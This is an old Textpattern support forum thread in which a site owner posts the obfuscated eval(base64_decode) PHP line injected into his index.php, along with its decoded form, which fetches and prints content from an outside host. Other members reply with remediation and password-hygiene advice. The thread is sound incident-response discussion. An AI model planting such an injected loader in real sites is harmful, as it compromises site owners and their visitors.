Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2009-04-21 16:53:07

douglgm
Member
From: Bristol
Registered: 2006-08-23
Posts: 182
Website

[resolved] My index.php file has been changed...

I found that my website wasn’t working today. On examination I discovered this at the bottom of the index.php and an index.htm file that had been created:

<!—eexi6—><?php eval(base64_decode(“JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=”)); ?>

This decodes to “ $l=“http://tourreviews.asia/links2/link.php”; if (extension_loaded(“curl”)){
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode(“”,file($l));} print @$r; “

Anyone had anything similar?

Offline

#2 2009-04-21 18:29:25

jm
Plugin Author
From: Missoula, MT
Registered: 2005-11-27
Posts: 1,746
Website

Re: [resolved] My index.php file has been changed...

File a ticket with your host (include the file), change your passwords (FTP, SSH, MySQL), and replace index.php (check other files, or just upload a fresh copy of TXP). Your account has most likely been cracked because this has happened to others running different software.

Offline

#3 2009-04-21 19:44:30

douglgm
Member
From: Bristol
Registered: 2006-08-23
Posts: 182
Website

Re: [resolved] My index.php file has been changed...

Thanks Jm, the first thing I did was raise a support request with the hosting provider.

As well as the two index files I noticed that the .htaccess file was also compromised.

Doug.

Offline

#4 2009-05-02 02:31:27

jsoo
Plugin Author
From: NC, USA
Registered: 2004-11-15
Posts: 1,793
Website

Re: [resolved] My index.php file has been changed...

A couple of my Txp sites were just cracked in a similar manner. I suspect the issue was an old version of punBB I was running on a not-very-active forum, but I’m not at all sure. A lot of crud I need to clean out on my web hosting account…


Code is topiary

Offline

#5 2009-05-02 04:05:53

Gocom
Developer Emeritus
From: Helsinki, Finland
Registered: 2006-07-14
Posts: 4,533
Website

Re: [resolved] My index.php file has been changed...

jsoo wrote:

I suspect the issue was an old version of punBB I was running on a not-very-active forum, but I’m not at all sure.

Best practice is not to let the site be “unactive” from the point of administration.

It’s very important to check the server activity, and make sure that you frequently basis change the passwords of FTP, TXP, server users (db etc) – and so on. It’s even more important if you have multiple admins running the site, as more authors make the password leak more likely.

Site authors are usually the biggest security risk, mostly when they know nothing about managing passwords and so forth. It’s kinda important to make sure that your authors don’t always use same passwords for their accounts, and that they don’t save the passwords on their insecure computers (or an a public systems (libraries etc) that crakers love). Some may say that over half of personal computers are so insecure that you can stole their stored data just by walking in.

Also updating is very important, and that you don’t choose the cheapest host that never updates their system. OS, Apache, PHP – all those things have to be updated. Plus it’s important to be sure that you use secure software. Even TXP plugins must be quality checked. Hopefully most of txp plugins are secure.

Last edited by Gocom (2009-05-02 04:10:19)

Offline

#6 2009-05-02 09:22:44

jsoo
Plugin Author
From: NC, USA
Registered: 2004-11-15
Posts: 1,793
Website

Re: [resolved] My index.php file has been changed...

All good advice — thanks.

Found another malicious file in the plugin cache directory for the sites that went down. (I have since disabled the plugin cache directory for live websites, and from now on will only use this feature on my local setup.) I decoded it and looked over the php code; I don’t have the patience or skill to figure it out entirely, but clearly it is attempting to write additional files to the server.

Fingers crossed that I got out of this one without any serious intrusion. A wake-up call at any rate.


Code is topiary

Offline

Board footer

Powered by FluxBB